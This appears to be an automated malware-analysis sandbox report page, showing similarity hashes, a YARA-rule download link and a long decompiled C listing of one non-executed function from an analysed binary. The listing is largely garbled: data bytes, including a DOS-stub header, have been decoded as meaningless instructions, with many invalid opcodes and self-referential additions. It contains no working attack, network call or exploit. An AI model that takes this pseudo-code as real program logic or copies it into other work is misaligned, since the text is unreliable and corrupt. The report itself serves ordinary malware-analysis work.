                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8043cffcf4fa6a691a49bf3761aae7c5db9c5513c7f8728b55970d86fdd4fe68
                                                        • Instruction ID: 06bc308db0f9e84b5419a5d7b789560af0a94561fd8015f835b3bb3cbf425150
                                                        • Opcode Fuzzy Hash: 8043cffcf4fa6a691a49bf3761aae7c5db9c5513c7f8728b55970d86fdd4fe68
                                                        • Instruction Fuzzy Hash: 6FB092312556080AEB605BB6784832A328C9750618F448471B90CC2A01F986E8610042
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 005A410E Relevance: .1, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 71%
                                                        			E005A410E(void* __eax, signed char __ebx, signed char __ecx, signed char __edx, signed int __edi, signed int* __esi, void* __eflags) {
				void* _t579;
				intOrPtr* _t582;
				signed int _t583;
				signed char _t584;
				intOrPtr* _t585;
				intOrPtr* _t586;
				signed char _t587;
				signed char _t588;
				signed char _t589;
				signed char _t591;
				signed int* _t595;
				signed char _t596;
				intOrPtr* _t600;
				intOrPtr* _t601;
				signed char _t602;
				signed char _t603;
				intOrPtr* _t606;
				signed char _t607;
				signed char _t610;
				signed char _t612;
				signed char _t613;
				signed char _t614;
				signed char _t615;
				signed int _t616;
				signed char _t617;
				signed char _t618;
				intOrPtr* _t621;
				intOrPtr* _t622;
				signed char _t623;
				signed char _t624;
				signed char _t625;
				signed char _t626;
				signed int _t629;
				signed char _t631;
				signed char _t632;
				signed int _t633;
				intOrPtr* _t634;
				signed char _t635;
				signed char _t637;
				signed char _t638;
				signed char* _t639;
				intOrPtr* _t641;
				intOrPtr* _t642;
				signed char _t646;
				signed char _t647;
				signed char _t648;
				signed char _t650;
				signed char* _t651;
				signed char* _t652;
				signed char _t653;
				signed char _t656;
				signed char _t657;
				signed char _t659;
				signed int _t660;
				signed int _t661;
				signed char _t662;
				signed char _t663;
				signed char _t664;
				void* _t669;
				signed int _t670;
				signed int _t671;
				signed char _t672;
				intOrPtr* _t675;
				signed char _t676;
				signed char _t677;
				signed char _t1151;
				signed char _t1152;
				signed char _t1153;
				intOrPtr* _t1157;
				signed char _t1159;
				signed char _t1160;
				signed char _t1161;
				signed char _t1162;
				signed char _t1163;
				intOrPtr* _t1164;
				signed char _t1165;
				signed char _t1166;
				signed char _t1167;
				signed char _t1169;
				signed char _t1172;
				signed char _t1173;
				signed char _t1174;
				signed char _t1176;
				signed char _t1177;
				signed char _t1178;
				signed int* _t1179;
				intOrPtr* _t1181;
				signed char _t1182;
				signed int _t1183;
				signed int _t1184;
				signed char _t1185;
				signed char _t1242;
				signed char _t1243;
				signed char _t1244;
				signed char _t1248;
				signed char _t1249;
				signed char _t1250;
				signed char _t1252;
				signed char _t1253;
				signed char _t1254;
				signed char _t1255;
				signed char _t1256;
				signed char _t1257;
				signed char _t1258;
				signed char _t1259;
				signed char _t1260;
				signed char _t1298;
				signed char _t1299;
				signed char _t1302;
				signed char _t1304;
				signed char _t1305;
				intOrPtr* _t1306;
				signed char _t1307;
				signed char _t1308;
				signed char _t1310;
				signed char _t1311;
				signed char _t1313;
				signed int _t1339;
				signed int* _t1341;
				signed int* _t1343;
				signed int* _t1344;
				signed int* _t1359;
				intOrPtr* _t1360;
				intOrPtr* _t1361;
				signed int* _t1363;
				signed int* _t1364;
				void* _t1372;
				signed int _t1373;
				signed char _t1374;
				signed int _t1377;
				signed char _t1383;
				void* _t1390;

				_t1359 = __esi;
				_t1339 = __edi;
				_t1298 = __edx;
				_t1244 = __ecx;
				_t1169 = __ebx;
				_t579 = __eax;
				_push(es);
				if(__eflags >= 0) {
					L7:
					_push(es);
					return _t579;
				} else {
					 *__eax =  *__eax + __al;
					__eflags =  *__eax;
					 *__edx =  *__edx + __cl;
					asm("adc al, 0x6f");
					asm("cli");
					 *__eax =  *__eax + __al;
					__ch = __ch |  *__edx;
					 *__ebx =  *__ebx + __dl;
					_t7 = __eax + __eax;
					 *_t7 =  *(__eax + __eax) ^ __al;
					__eflags =  *_t7;
					__esp = __esp + 1;
					while(1) {
						 *__eax =  *__eax + __al;
						 *__ebx =  *__ebx + __cl;
						 *__eax =  *__eax + __al;
						asm("adc [edx], eax");
						_push(ds);
						__eax = __eax - 0x20062617;
						__eflags = __eax;
						if(__eflags >= 0) {
							break;
						}
						if(__eflags >= 0) {
							_t1373 = _t1372 - 1;
						} else {
							 *__edx =  *__edx - __ah;
							__eflags =  *__edx;
							 *_t582 =  *_t582 + _t582;
							_push(es);
							_push(ss);
							 *_t1339 =  *_t1339 - _t1244;
							 *_t1298 =  *_t1298 + _t1244;
							_push(ss);
							_t1298 = _t1298 ^  *_t1244;
							_t583 = _t582 -  *_t1169;
							_t1244 = _t1244 |  *_t1169;
							asm("out 0x28, eax");
							asm("aaa");
							 *_t583 =  *_t583 + _t583;
							_push(es);
							_t9 = _t1373 + 0x2b060000;
							 *_t9 =  *(_t1373 + 0x2b060000) - _t1169;
							__eflags =  *_t9;
							L14:
							 *_t1359 =  *_t1359 + _t583;
							_t1169 = _t1169 -  *_t1244;
							_push(es);
							 *_t1339 =  *_t1339 & _t583;
							__eflags =  *_t1339;
							if( *_t1339 >= 0) {
								 *_t583 =  *_t583 + _t583;
								_t1298 = _t1298 |  *(_t1339 + _t1373 * 2);
								asm("cli");
								 *_t583 =  *_t583 + _t583;
								_t1244 = _t1244 |  *_t1169;
								_pop(ss);
								if(_t1244 <= 0) {
									goto L14;
								} else {
									 *_t583 =  *_t583 + _t583;
									_t579 = _t583 + 0x14;
									 *_t1359 =  *_t1359 + 1;
									goto L7;
								}
							} else {
								 *_t1298 =  *_t1298 - _t583;
								 *_t583 =  *_t583 + _t583;
								_push(es);
								_push(ss);
								 *_t1339 =  *_t1339 - _t1244;
								 *_t1298 =  *_t1298 + _t1244;
								_push(ss);
								_t584 = _t583 ^  *0x3828;
								_push(es);
								_t1299 = _t1298 -  *_t1169;
								__eflags = _t1299;
								L16:
								_t11 = _t584 + _t584;
								 *_t11 =  *(_t584 + _t584) ^ _t584;
								__eflags =  *_t11;
								break;
							}
						}
						goto L371;
					}
					 *_t1339 =  *_t1339 + _t1299;
					 *_t584 =  *_t584 + _t584;
					 *0x28110000 =  *0x28110000 + _t1169;
					asm("sldt word [eax]");
					_push(es);
					_t585 = _t584 - _t584;
					 *_t585 =  *_t585 + _t585;
					_t586 = _t585 - 0xc6732620;
					 *_t586 =  *_t586 + _t586;
					_push(es);
					asm("adc eax, 0x7e261a2d");
					_t1359 = _t1359 - 1;
					 *_t586 =  *_t586 + _t586;
					_t587 = _t586 + 0x28;
					asm("sti");
					 *_t587 =  *_t587 + _t587;
					_t588 = _t587 |  *_t1359;
					asm("outsd");
					asm("cld");
					 *_t588 =  *_t588 + _t588;
					 *_t588 =  *_t588 + _t588;
					_push(es);
					_t1244 = (_t1244 |  *(_t1339 - 0x39)) -  *_t1299;
					_t1169 = (_t1169 |  *_t1299) - _t1359;
					_t584 = _t588 + 0x2b;
					asm("loopne 0x2");
					_t1299 = _t1299 - 1;
					__eflags = _t1299;
					asm("adc al, 0xfe");
					_push(es);
					asm("rol dword [eax], 0x0");
					_push(es);
					if(_t1299 >= 0) {
						goto L16;
					}
					 *_t584 =  *_t584 + _t584;
					_push(es);
					asm("outsd");
					 *_t1359 =  *_t1359 + _t584;
					_t589 = _t584 -  *_t584;
					__eflags = _t589;
					if(_t589 <= 0) {
						_t591 = _t1244;
						_t1247 = _t591;
						_push(ds);
						asm("bound esp, [eax+0x8]");
						asm("sbb [edx+0x58], esp");
						asm("adc eax, [0x2b0a4f2b]");
						asm("ror dword [ebx], cl");
						asm("loope 0x13");
						_t595 = (_t589 - 0x1602261d | 0x1604133f) + 0x152d5f17;
						 *_t595 =  *_t595 | _t1383;
						asm("std");
						_t1172 = _t1169 +  *_t591 + 1;
						_t596 = _t595 +  *_t595;
						__eflags = _t596;
						do {
							_pop(_t1302);
							_t1172 = _t1172 & _t596;
							asm("sahf");
							 *[es:eax+0xd] =  *[es:eax+0xd] + _t1172;
							 *_t1339 =  *_t1339 | _t1172;
							asm("adc [ecx+edx*8+0x13], ah");
							asm("adc eax, [esi]");
							asm("adc [esi+ebx], eax");
							asm("arpl cx, dx");
							asm("adc eax, [ebx+eax]");
							asm("adc [0x3071391], eax");
							asm("adc [0x61060711], eax");
							 *_t1247 =  *_t1247 | _t1172;
							asm("popad");
							asm("adc [esi], eax");
							asm("popad");
							asm("rcr byte [ecx+edx+0x5110c07], cl");
							_pop(ss);
							_pop(_t600);
							asm("adc eax, [0x32070511]");
							_t1247 = 3;
							_t601 = _t600 -  *_t600;
							asm("adc esi, [eax]");
							 *_t601 =  *_t601 + _t601;
							_push(es);
							 *_t601 =  *_t601 + _t601;
							 *_t1339 =  *_t1339 + _t1172;
							 *_t601 =  *_t601 + _t601;
							asm("adc [eax], ebp");
							asm("retf");
							 *_t601 =  *_t601 + _t601;
							_push(es);
							_t602 = _t601 -  *_t601;
							 *_t1172 =  *_t1172 + _t602;
							 *3 =  *3 ^ 0x00000003;
							 *3 =  *3 + _t1172;
							 *_t602 =  *_t602 + _t602;
							 *_t602 =  *_t602 + _t602;
							 *_t602 =  *_t602 + _t602;
							 *_t1302 =  *_t1302 + _t602;
							 *_t1172 =  *_t1172 - _t602;
							 *_t602 =  *_t602 + _t602;
							_t596 = _t602 |  *_t1302;
							__eflags = _t596;
						} while (_t596 >= 0);
						 *_t596 =  *_t596 + _t596;
						_t1173 = _t1172 |  *_t1302;
						_t603 = _t596 - 0x2a262603;
						__eflags = _t603;
						if(_t603 < 0) {
							 *_t603 =  *_t603 + _t603;
							_t1161 = _t603 + 0x2b;
							asm("clc");
							 *_t1161 =  *_t1161 + _t1161;
							 *_t1173 =  *_t1173 + _t1302;
							 *_t1173 =  *_t1173 ^ _t1161;
							 *_t1173 =  *_t1173 + _t1173;
							 *_t1161 =  *_t1161 + _t1161;
							 *_t1161 =  *_t1161 + _t1161;
							 *3 =  *3 + _t1302;
							_t1242 = _t1173 +  *((intOrPtr*)(_t1173 + 0x52));
							 *_t1161 =  *_t1161 + _t1161;
							_t1162 = _t1161 + 0x6f;
							asm("std");
							 *_t1162 =  *_t1162 + _t1162;
							_t1163 = _t1162 |  *_t1242;
							__eflags = _t1163;
							do {
							} while (__eflags >= 0);
							 *_t1163 =  *_t1163 + _t1163;
							_t1243 = _t1242 |  *_t1302;
							_t1164 = _t1163 - 0x142b2603;
							_t1247 = 0x00000003 |  *_t1243;
							asm("sti");
							_t1173 = _t1243 +  *((intOrPtr*)(_t1243 + 0x52));
							 *_t1164 =  *_t1164 + _t1164;
							_t1165 = _t1164 + 6;
							asm("outsd");
							 *_t1165 =  *_t1165 + 1;
							 *_t1302 =  *_t1302 + _t1247;
							asm("outsd");
							_t1166 = _t1165;
							 *_t1166 =  *_t1166 + _t1166;
							_t1167 = _t1166 |  *_t1359;
							asm("outsd");
							 *_t1247 =  *_t1247 + _t1167;
							 *_t1302 =  *_t1302 + _t1247;
							asm("adc eax, 0x6f06e633");
							 *_t1247 =  *_t1247 + _t1167;
							 *_t1302 =  *_t1302 + _t1247;
							_t603 = _t1167 -  *_t1167;
							asm("sbb esi, [eax]");
						}
						_pop(es);
						 *((intOrPtr*)(_t1339 + 0x41000001)) =  *((intOrPtr*)(_t1339 + 0x41000001)) + _t1173;
						 *_t603 =  *_t603 + _t603;
						__eflags =  *_t603;
						asm("adc [ebx], eax");
						_push(ss);
						if( *_t603 < 0) {
							 *_t603 =  *_t603 + _t603;
							__eflags =  *_t603;
						}
						_t1174 = _t1173 |  *_t603;
						 *_t1302 =  *_t1302 + _t1247;
						_t606 = _t603 - 0x6f09260b +  *_t1247 - 0xd032b08;
						_t1360 = _t1359 - _t1174;
						_t1374 = _t1373 +  *_t1174;
						_push(es);
						 *(_t1339 + 4) =  *(_t1339 + 4) | _t1374;
						 *_t606 =  *_t606 + _t606;
						_t607 = _t606 - 0x17082626;
						_t1176 = _t1339;
						 *_t607 =  *_t607 + _t607;
						__eflags =  *_t607;
						do {
							 *((intOrPtr*)(_t1374 + 0xb11261e)) =  *((intOrPtr*)(_t1374 + 0xb11261e)) + _t1176;
							ds = ss;
							asm("popfd");
							asm("adc [ebx], ecx");
							_pop(ss);
							asm("outsd");
							_t1176 = 0x17;
							_t1302 = _t1302 ^  *_t1339;
							_t1247 = _t1247 -  *_t1302;
							_t607 = _t607 + 0x1b0a0001 - 0x8e072610 | 0x0000002b;
							asm("fcom dword [ebx]");
							asm("fisttp word [ebx]");
							_t1374 = (_t1374 |  *0x17) - _t1360;
							__eflags = _t1374;
							if(__eflags > 0) {
								 *_t607 =  *_t607 + _t607;
								_t1247 = _t1247 |  *_t1302;
								asm("fnstsw word [esi]");
								 *_t607 =  *_t607 + _t607;
								 *_t1360 =  *_t1360 + _t1302;
								_pop(es);
								asm("invalid");
								__eflags = _t1302 - _t607;
								 *_t607 =  *_t607 + _t607;
								 *_t607 =  *_t607 + _t607;
								 *0x28a0793f = _t607;
								_t1160 = _t607 &  *_t607;
								 *_t1360 =  *_t1360 + _t1160;
								_pop(es);
								asm("adc [esi], eax");
								_pop(es);
								asm("invalid");
								_push(es);
								 *_t1160 =  *_t1160 + _t1160;
								_t1302 = _t1302 |  *0x17;
								_t607 = _t1160 + 0x20;
								__eflags = _t607;
							}
							asm("stosb");
							asm("aas");
						} while (__eflags >= 0);
						 *_t1302 =  *_t1302 - _t607;
						 *_t607 =  *_t607 + _t607;
						0x28a0793f[_t1302] = 0x28a0793f[_t1302] & _t607;
						_t610 = _t607 &  *_t607;
						 *_t1360 =  *_t1360 + _t610;
						es = es;
						asm("adc [esi], eax");
						_pop(ss);
						asm("salc");
						_pop(es);
						asm("invalid");
						asm("fisubr dword [eax]");
						_push(es);
						 *_t610 =  *_t610 + _t610;
						_t1248 = _t1247 |  *_t610;
						 *_t1302 =  *_t1302 + _t1248;
						asm("adc eax, [edi]");
						0x28a0793f[_t1374] = 0x28a0793f[_t1374] & _t1302;
						_t612 = (_t610 ^ 0x00000000) &  *(_t610 ^ 0x00000000);
						 *_t1360 =  *_t1360 + _t612;
						asm("adc [eax+ebp], eax");
						_t613 = _t612 ^ 0x00000000;
						 *_t1302 =  *_t1302 + _t1248;
						asm("adc eax, [0x527b02]");
						 *((intOrPtr*)(_t1248 + _t1302)) =  *((intOrPtr*)(_t1248 + _t1302)) + _t613;
						_t614 = _t613 + 0xe76f;
						__eflags = _t614;
						while(1) {
							asm("outsd");
							asm("out 0x0, eax");
							 *_t1302 =  *_t1302 + _t1248;
							_t615 = _t614 - 0x1e;
							0x28a0793f[_t1302] = 0x28a0793f[_t1302] & _t615;
							_t616 = _t615 &  *_t615;
							 *_t1360 =  *_t1360 + _t616;
							_pop(es);
							asm("adc [esi], eax");
							_pop(es);
							asm("invalid");
							_push(es);
							 *_t616 =  *_t616 + _t616;
							_t1249 = _t1248 |  *_t1302;
							asm("invalid");
							 *_t616 =  *_t616 + _t616;
							 *_t1302 =  *_t1302 + _t616;
							__eflags =  *_t1302;
							if( *_t1302 != 0) {
								break;
							}
							 *_t616 =  *_t616 + _t616;
							asm("out 0x0, eax");
							 *_t1302 =  *_t1302 + _t1249;
							_t1157 = _t616 + 0x80 - 0x527b020f;
							 *_t1157 =  *_t1157 + _t1157;
							_pop(es);
							asm("outsd");
							asm("out 0x0, eax");
							 *_t1302 =  *_t1302 + _t1249;
							_t1159 = _t1157 + 0x11 - 0x37;
							asm("adc [esi], eax");
							_t1302 = _t1302 ^  *_t1176;
							0x28a0793f[_t1302] = 0x28a0793f[_t1302] & _t1159;
							_t614 = _t1159 &  *_t1159;
							 *_t1360 =  *_t1360 + _t614;
							es = ss;
							 *_t1339 =  *_t1339 - _t614;
							 *_t614 =  *_t614 + _t614;
							_t1248 = _t1249 |  *_t1302;
							__eflags = _t1248;
							asm("fidiv word [eax-0x5e]");
							asm("aas");
							if(_t1248 >= 0) {
								continue;
							} else {
								 *_t1302 =  *_t1302 - _t614;
								 *_t614 =  *_t614 + _t614;
								es = es;
								asm("adc [esi], eax");
								_pop(ss);
								asm("fiadd dword [edi]");
								asm("invalid");
								asm("salc");
								 *_t1360 =  *_t1360 - _t614;
								 *_t614 =  *_t614 + _t614;
								_t1249 = _t1248 |  *_t1302;
								asm("ficom word [ebp+0x11]");
							}
							break;
						}
						asm("adc [esi], eax");
						_pop(ss);
						asm("salc");
						asm("adc eax, [esi]");
						asm("adc [esi], eax");
						asm("adc [edx], ecx");
						asm("adc eax, 0xdeffffff");
						_t617 = _t616 & 0x00004d28;
						 *_t617 =  *_t617 | _t617;
						_t618 = _t617 &  *_t617;
						 *_t1360 =  *_t1360 + _t618;
						_t1377 =  &(0x28a0793f[ *_t618]);
						asm("cmpsd");
						 *_t618 =  *_t618 + _t618;
						_t1304 = _t1302 |  *_t1176 |  *_t1176;
						 *(_t1360 + 0x47) =  *(_t1360 + 0x47) | _t1339;
						 *_t618 =  *_t618 + _t618;
						 *_t1249 =  *_t1249 | _t1304;
						 *(_t1176 + 8) =  *(_t1176 + 8) | _t1304;
						 *((intOrPtr*)(_t618 + 0x11)) =  *((intOrPtr*)(_t618 + 0x11)) + _t618 + 0x11;
						asm("bound edi, [ecx+edi*2]");
						_t621 =  *0x2228;
						_push(es);
						asm("outsd");
						 *_t621 =  *_t621 + 0x4e280a00;
						 *_t621 =  *_t621 + _t621;
						_t1177 = _t1176 | _t1304;
						 *((intOrPtr*)(_t1360 + 0x31)) =  *((intOrPtr*)(_t1360 + 0x31)) + _t1177;
						 *_t621 =  *_t621 + _t621;
						_t1250 = _t1249 |  *_t1304;
						_t622 = _t621 -  *_t1250;
						asm("sbb al, 0x0");
						 *_t622 =  *_t622 + _t622;
						 *_t622 =  *_t622 + _t622;
						 *_t622 =  *_t622 + _t622;
						 *_t622 =  *_t622 + _t622;
						 *((intOrPtr*)(_t1250 + 2)) =  *((intOrPtr*)(_t1250 + 2)) + _t1177;
						 *_t622 =  *_t622 + _t622;
						_t1252 = es;
						 *_t622 =  *_t622 + _t622;
						 *_t1360 =  *_t1360 + _t1177;
						 *_t622 =  *_t622 + _t622;
						 *_t1304 =  *_t1304 + _t1177;
						 *_t622 =  *_t622 + _t622;
						 *_t1177 =  *_t1177 + _t622;
						 *_t1252 =  *_t1252 ^ _t1252;
						 *_t1177 =  *_t1177 + _t1177;
						 *_t622 =  *_t622 + _t622;
						 *_t622 =  *_t622 + _t622;
						 *_t622 =  *_t622 + _t622;
						 *((intOrPtr*)(_t1177 - 0x36)) =  *((intOrPtr*)(_t1177 - 0x36)) + _t1304;
						 *_t622 =  *_t622 + _t622;
						_push(es);
						 *_t1252 =  *_t1252 - _t1252;
						 *_t622 =  *_t622 + _t622;
						_t1305 = _t1304 | 0x28a0793f[_t1360];
						 *_t1305 =  *_t1305 + _t622;
						asm("adc eax, 0x2a26022d");
						 *0x28a0793f =  *0x28a0793f;
						_t623 = _t622 + 0x2b;
						asm("clc");
						 *_t1177 =  *_t1177 + _t623;
						 *_t1305 =  *_t1305 ^ _t1252;
						 *_t1339 =  *_t1339 + _t1252;
						 *_t623 =  *_t623 + _t623;
						 *_t623 =  *_t623 + _t623;
						 *_t623 =  *_t623 + _t623;
						 *_t1305 =  *_t1305 + _t623;
						asm("sbb [ebp+0xa282607], ebx");
						 *_t623 =  *_t623 + _t623;
						_t1253 = _t1252 |  *_t1305;
						_t1361 = _t1360 - _t1339;
						 *_t1177 =  *_t1177 + _t1305;
						 *_t1253 =  *_t1253 ^ _t623;
						 *_t1361 =  *_t1361 + _t623;
						 *_t623 =  *_t623 + _t623;
						 *_t1339 =  *_t1339 + _t1177;
						 *_t623 =  *_t623 + _t623;
						asm("adc [esi+0x6d], edi");
						 *_t623 =  *_t623 + _t623;
						_t624 = _t623 + 0x2a;
						 *_t624 =  *_t624 + _t624;
						_t625 = _t624 |  *_t624;
						asm("sldt word [eax]");
						 *_t625 =  *_t625 + _t625;
						 *_t625 =  *_t625 + _t625;
						 *_t1305 =  *_t1305 + _t625;
						_push(ss);
						asm("sbb [0x23282607], ebp");
						 *_t625 =  *_t625 + _t625;
						_t1254 = _t1253 |  *_t1305;
						_t1363 = _t1361 +  *_t624 - _t1339;
						 *((intOrPtr*)(_t1254 - 0x7b)) =  *((intOrPtr*)(_t1254 - 0x7b)) + _t1177;
						 *_t625 =  *_t625 + _t625;
						asm("into");
						asm("retf 0xbeef");
						 *_t625 =  *_t625 + _t625;
						 *_t625 =  *_t625 + _t625;
						_t626 = _t1254;
						_t1255 = _t625;
						 *_t626 =  *_t626 + _t626;
						_t48 = _t1177 + 0x79 + _t1305 * 2;
						 *_t48 =  *(_t1177 + 0x79 + _t1305 * 2) + _t1255;
						__eflags =  *_t48;
						if(__eflags >= 0) {
							if(__eflags != 0) {
								goto L71;
							} else {
								goto L54;
							}
						} else {
							asm("gs insd");
							_push(_t1305);
							if(__eflags >= 0) {
								L54:
								asm("arpl [ebp+0x73], sp");
								_push(_t1305);
								goto L55;
							} else {
								if(__eflags != 0) {
									L55:
									if(__eflags != 0) {
										goto L72;
									} else {
										if(__eflags == 0) {
											goto L71;
										} else {
											asm("insd");
											goto L58;
										}
									}
								} else {
									asm("arpl [ebp+0x73], sp");
									_push(_t1305);
									if(__eflags >= 0) {
										L58:
										_push(_t1305);
										if(__eflags >= 0) {
											goto L73;
										} else {
											goto L59;
										}
									} else {
										if(__eflags != 0) {
											L59:
											if(__eflags == 0) {
												asm("arpl [ebp+0x53], sp");
												if(__eflags != 0) {
													 *_t626 =  *_t626 + _t626;
													__eflags =  *_t626;
												}
												 *_t1305 =  *_t1305 + _t626;
												 *_t626 =  *_t626 + _t626;
												 *_t626 =  *_t626 + _t626;
												__eflags =  *_t626;
												goto L63;
											}
										} else {
											asm("arpl [ebp+0x52], sp");
											asm("popad");
											if(__eflags < 0) {
												L48:
												 *(_t626 + 0x75) =  *(_t626 + 0x75) & _t1305;
												asm("bound ebp, [ecx+ebp*2+0x63]");
											} else {
												 *0x28A079B2 =  *0x28A079B2 & _t1255;
												asm("arpl [edi+0x72], bp");
												asm("insb");
												_t1383 =  *(_t1305 + 0x2c) * 0x72655620;
												__eflags = _t1383;
												if(_t1383 >= 0) {
													L63:
													 *_t626 =  *_t626 + _t626;
													 *((intOrPtr*)(_t626 + 0x41)) =  *((intOrPtr*)(_t626 + 0x41)) + _t1305;
													_push(_t626);
													__eflags = _t1255 + 1;
													_t1390 = _t1383 + 2;
													_push(_t626);
													_t1255 = 0x1f0b87ff;
													goto L64;
												} else {
													asm("outsd");
													asm("outsb");
													__eflags = _t626 - 0x2e302e32;
													 *_t1363 =  *_t1363 ^ _t1255;
													 *_t626 =  *_t626 ^ _t1255;
													_t1177 = _t1177 + 1;
													__eflags = _t1177;
													if(__eflags != 0) {
														L65:
														_t1153 = _t626;
														 *_t1153 =  *_t1153 + _t1153;
														__eflags =  *_t1153;
														_t626 = _t1153 + _t1177;
														 *_t626 =  *_t626 + _t626;
														__eflags =  *_t626;
														goto L67;
													} else {
														if(__eflags == 0) {
															L67:
															 *_t626 =  *_t626 + _t1255;
															_t1383 = _t1390 - 1;
															 *_t1305 =  *_t1305 + _t1177;
															asm("insd");
															 *_t1255 =  *_t1255 + _t626;
															 *_t626 =  *_t626 + _t626;
															 *_t626 =  *_t626 + _t626;
															_push(es);
															_push(_t1383);
															 *((intOrPtr*)(_t626 + _t626 + 0x44)) =  *((intOrPtr*)(_t626 + _t626 + 0x44)) + _t1255;
															 *0x20000030 =  *0x20000030 + _t626;
															 *_t626 =  *_t626 + _t1305;
															 *_t626 =  *_t626 + _t626;
															_t1377 = _t1377 - 1;
															__eflags = _t1377;
															 *_t1177 =  *_t1177 + _t626;
															 *_t626 =  *_t626 + _t626;
															 *((intOrPtr*)(_t626 + _t626)) =  *((intOrPtr*)(_t626 + _t626)) + _t626;
															 *_t626 =  *_t626 + _t626;
															asm("invalid");
															 *_t626 =  *_t626 + _t626;
															__eflags =  *_t626;
															 *_t626 =  *_t626 + _t1177;
															__eflags =  *_t626;
															 *_t626 =  *_t626 + _t626;
															 *_t626 =  *_t626 + _t626;
															 *_t626 =  *_t626 + _t626;
															__eflags =  *_t626;
															L71:
															_t626 = _t626 + 1;
															 *_t626 =  *_t626 + _t626;
															__eflags =  *_t626;
															L72:
															 *_t626 =  *_t626 + _t626;
															 *_t626 =  *_t626 + _t626;
															 *_t626 =  *_t626 + _t626;
															 *_t626 =  *_t626 + _t626;
															 *_t626 =  *_t626 + _t626;
															__eflags =  *_t626;
															L73:
															 *_t626 =  *_t626 + _t626;
															 *_t626 =  *_t626 + _t626;
															 *_t626 =  *_t626 + _t626;
															__eflags =  *_t626;
														} else {
															if(__eflags < 0) {
																L64:
																asm("sbb [esp+edi*2+0xd], eax");
																goto L65;
															} else {
																__eflags = _t626 - 0x7475656e;
																if(_t626 < 0x7475656e) {
																	goto L65;
																} else {
																	asm("insb");
																	_t626 = _t626 - 0x20;
																	__eflags = _t626;
																	goto L48;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						 *_t626 =  *_t626 + _t626;
						 *_t626 =  *_t626 + _t626;
						 *_t626 =  *_t626 + _t626;
						 *_t626 =  *_t626 + _t626;
						 *_t626 =  *_t626 + _t626;
						 *_t626 =  *_t626 + _t626;
						 *_t626 =  *_t626 + _t626;
						 *_t626 =  *_t626 + _t626;
						 *_t626 =  *_t626 + _t626;
						_t69 = _t626 + 0xe000000;
						 *_t69 =  *(_t626 + 0xe000000) + _t626;
						__eflags =  *_t69;
						_pop(ds);
						_t1306 = 0x9b4000e;
						asm("int 0x21");
						_t627 = 0x21cd4c01;
						_push(_t1383);
						_push(0x70207369);
						if( *_t69 < 0) {
							L79:
							 *_t627 =  &(_t627[ *_t627]);
							_t627[_t627] =  &(_t627[_t627[_t627]]);
							 *_t627 =  &(_t627[ *_t627]);
							 *_t627 =  &(_t627[ *_t627]);
							 *_t627 =  &(_t627[ *_t627]);
							_t627[0x2000000] =  &(_t627[_t627[0x2000000]]);
							 *_t627 =  &(_t627[ *_t627]);
							 *_t627 =  &(_t627[ *_t627]);
							 *_t627 =  &(_t627[ *_t627]);
							__eflags =  *_t627;
						} else {
							asm("a16 jb 0x64");
							asm("insd");
							_t71 = _t1177 + 0x61;
							 *_t71 =  *(_t1177 + 0x61) & 0x21cd4c01;
							__eflags =  *_t71;
							asm("outsb");
							asm("outsb");
							asm("outsd");
							if(__eflags == 0) {
								L78:
								 *_t627 =  &(_t627[ *_t627]);
								_t1383 = _t1383 - 1;
								 *_t1177 =  &(_t627[ *_t1177]);
								 *_t1363 =  &(_t627[ *_t1363]);
								asm("movsb");
								_t1377 = _t1377 - 1;
								 *_t627 =  &(_t627[ *_t627]);
								 *_t627 =  &(_t627[ *_t627]);
								 *_t627 =  &(_t627[ *_t627]);
								 *_t627 =  &(_t627[ *_t627]);
								asm("loopne 0x2");
								_t1151 =  &(_t627[ *_t1255]) |  *_t1255;
								 *_t1151 =  *_t1151 | _t1151;
								 *_t1151 =  *_t1151 + _t1255;
								 *_t1151 =  *_t1151 + _t1151;
								 *_t1363 =  *_t1363 + _t1151;
								 *_t1151 =  *_t1151 + _t1151;
								 *_t1151 =  *_t1151 + _t1151;
								 *_t1151 =  *_t1151 + _t1151;
								es =  *_t1363;
								 *_t1151 =  *_t1151 + _t1151;
								 *_t1151 =  *_t1151 & _t1151;
								 *_t1151 =  *_t1151 + _t1151;
								asm("pushad");
								 *_t1151 =  *_t1151 + _t1151;
								 *_t1151 =  *_t1151 + _t1151;
								_t1152 = _t1151 + 1;
								 *_t1152 =  *_t1152 + _t1152;
								 *_t1152 =  *_t1152 & _t1152;
								 *_t1152 =  *_t1152 + _t1152;
								_t627 = _t1152 +  *_t1152;
								_t627[_t627] =  &(_t627[_t627[_t627]]);
								 *_t627 =  &(_t627[ *_t627]);
								 *_t627 =  &(_t627[ *_t627]);
								__eflags =  *_t627;
								goto L79;
							} else {
								asm("bound esp, [ebp+0x20]");
								if(__eflags >= 0) {
									asm("outsb");
									 *(_t1255 + 0x6e) =  *(_t1255 + 0x6e) & _t1255;
									 *(_t1339 + 0x53 + _t1255 * 2) =  *(_t1339 + 0x53 + _t1255 * 2) & 0x21cd4c01;
									 *(_t1377 + 0x6f) =  *(_t1377 + 0x6f) & _t1255;
									_t627 = 0x21ed4e0d;
									 *0x21cd4c01 =  *0x21cd4c01 + 0x21ed4e0d;
									 *0x21cd4c01 =  *0x21cd4c01 + 0x21ed4e0d;
									 *0x21cd4c01 =  *0x21cd4c01 + 0x21ed4e0d;
									_push(0x21cd4c01);
									_t1377 = _t1377 + 1;
									__eflags = _t1377;
									goto L78;
								}
							}
						}
						_t629 =  &(( &(_t627[ *_t627]))[1]);
						__eflags =  *_t629 & _t629;
						 *_t629 =  *_t629 + _t1306;
						 *_t629 =  *_t629 + _t629;
						asm("adc [eax], al");
						 *_t629 =  *_t629 + _t629;
						 *_t629 =  *_t629 + _t1306;
						 *_t629 =  *_t629 + _t629;
						asm("adc [eax], al");
						 *_t629 =  *_t629 + _t629;
						 *_t629 =  *_t629 + _t629;
						 *_t629 =  *_t629 + _t1306;
						 *_t629 =  *_t629 + _t629;
						 *_t629 =  *_t629 + _t629;
						 *_t629 =  *_t629 + _t629;
						 *_t629 =  *_t629 + _t629;
						 *_t629 =  *_t629 + _t629;
						 *_t629 =  *_t629 + _t1177;
						_t1364 =  &(_t1363[0]);
						 *_t629 =  *_t629 + _t629;
						_push(_t1177);
						 *_t629 =  *_t629 + _t629;
						 *_t629 =  *_t629 + _t629;
						asm("pushad");
						 *_t629 =  *_t629 + _t629;
